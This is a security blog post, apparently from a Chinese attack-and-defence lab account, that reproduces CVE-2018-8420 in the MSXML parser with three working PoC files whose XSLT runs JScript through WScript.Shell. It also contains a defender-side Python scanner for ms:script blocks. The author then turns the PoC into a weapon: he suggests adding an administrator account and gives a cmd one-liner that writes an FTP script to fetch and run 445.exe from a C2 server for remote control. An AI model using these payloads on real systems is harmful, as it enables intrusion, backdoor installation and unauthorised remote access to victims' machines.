CVE-2018-8420 (Reproducing the MSXML parser remote code execution vulnerability)


First of all, special thanks to 倾旋 for providing the PoC code!!!




First, the affected versions:

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 Version 1803 for 32-bit Systems
  • Microsoft Windows 10 Version 1803 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 10 version 1709 for 32-bit Systems
  • Microsoft Windows 10 version 1709 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for 64-bit Systems
  • Microsoft Windows RT 8.1
  • Microsoft Windows Server 1709
  • Microsoft Windows Server 1803
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016


PoC:

PoC repository: https://github.com/Lz1y/CVE-2018-8420



//xml.html

<!--from 倾旋-->
<script type="text/vbscript">
Sub POC()
    ' Load xml.xml with MSXML and use the same document as both source and stylesheet
    Set XML = CreateObject("Microsoft.XMLDOM")
    XML.async = False
    Set xsl = XML
    xsl.Load "xml.xml"
    ' transformNode runs the ms:script block embedded in the stylesheet
    XML.transformNode xsl
End Sub
POC()
</script>


//xml.vbs

' Same logic as xml.html, as a stand-alone VBScript file
Sub Dummy()
    Set XML = CreateObject("Microsoft.XMLDOM")
    XML.async = False
    Set xsl = XML
    xsl.Load "xml.xml"
    XML.transformNode xsl
End Sub
Dummy()



//xml.xml

<?xml version='1.0'?>
<stylesheet
    xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
    xmlns:user="placeholder"
    version="1.0">
<output method="text"/>
<!-- MSXML's ms:script extension lets the stylesheet carry JScript that runs during the transform -->
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]></ms:script>
</stylesheet>



Those are the three files.

Simply running xml.html or xml.vbs is enough to trigger the vulnerability.
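As an added, defender-side example (not part of the original post or of the PoC repository): a small Python scanner that flags XSLT documents carrying MSXML ms:script extension blocks, which is the feature xml.xml above relies on to run JScript during a transform. The sample stylesheets and the keyword list are constructed here as assumptions.

```python
"""Flag XSLT stylesheets that embed MSXML ms:script blocks (added example)."""
import re
import xml.etree.ElementTree as ET

MS_XSLT_NS = "urn:schemas-microsoft-com:xslt"
# Assumed indicator set: script bodies that reach out of the XSLT engine via COM.
SUSPICIOUS = re.compile(
    r"ActiveXObject|WScript\.Shell|Scripting\.FileSystemObject|\.Run\(", re.I
)


def find_script_blocks(xml_text):
    """Return one finding per <ms:script> element in the document."""
    root = ET.fromstring(xml_text)
    findings = []
    # CDATA content is exposed as the element's .text by ElementTree.
    for el in root.iter("{%s}script" % MS_XSLT_NS):
        body = (el.text or "").strip()
        findings.append({
            "language": el.get("language", "JScript"),  # MSXML default
            "implements_prefix": el.get("implements-prefix", ""),
            "suspicious": bool(SUSPICIOUS.search(body)),
            "snippet": body[:80],
        })
    return findings


def classify(xml_text):
    """'malicious' (COM reach-out), 'script' (any ms:script), 'clean' or 'unparseable'."""
    try:
        findings = find_script_blocks(xml_text)
    except ET.ParseError:
        return "unparseable"
    if any(f["suspicious"] for f in findings):
        return "malicious"
    return "script" if findings else "clean"


# Constructed samples: the PoC-style stylesheet, a harmless helper, and a plain one.
POC_XSLT = """<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
    xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript"><![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]></ms:script>
</stylesheet>"""
HELPER_XSLT = """<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
    xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="x" version="1.0">
<ms:script implements-prefix="user" language="JScript">function dbl(n){return n*2;}</ms:script>
</stylesheet>"""
CLEAN_XSLT = """<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" version="1.0">
<output method="text"/></stylesheet>"""
```

Running classify() over stylesheets delivered by mail or web content gives a cheap triage signal; the telemetry to pair it with is a script host (wscript/cscript/mshta/browser) loading msxml3.dll and then spawning a child process.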





That is the reproduction process so far.









Of course, if that were all, it would be rather underwhelming. Then an idea suddenly struck me!!!


Let's look at line 9 of xml.xml:

var r = new ActiveXObject("WScript.Shell").Run("calc.exe");


calc.exe only pops a calculator; what if we ran a privilege-escalation command such as net user admin admin /add instead?

Of course, running net user directly is usually blocked by the Windows firewall, so let's follow this line of thought further: how do we avoid being blocked and still get a foothold on the target?

Hehe, so here is a piece of code from my private collection.

cmd /c @echo open 127.0.0.1>>Ex.dat&@echo 123>>Ex.dat&@echo 33444545>>Ex.dat&echo bin>>Ex.dat&@echo get 445.exe>>Ex.dat&@echo bye>>Ex.dat&@echo 445.exe>>Ex.dat&@ftp -s:Ex.dat&del Ex.dat&csrss.exe&445.exe

127.0.0.1 stands for your own C2 server; set up HFS on that server and it works together with this one-liner for remote control.

//No screenshots, to avoid being invited for tea.








Author: ian







This article was first published on the WeChat official account 零组攻防实验室: CVE-2018-8420 (Reproducing the MSXML parser remote code execution vulnerability)
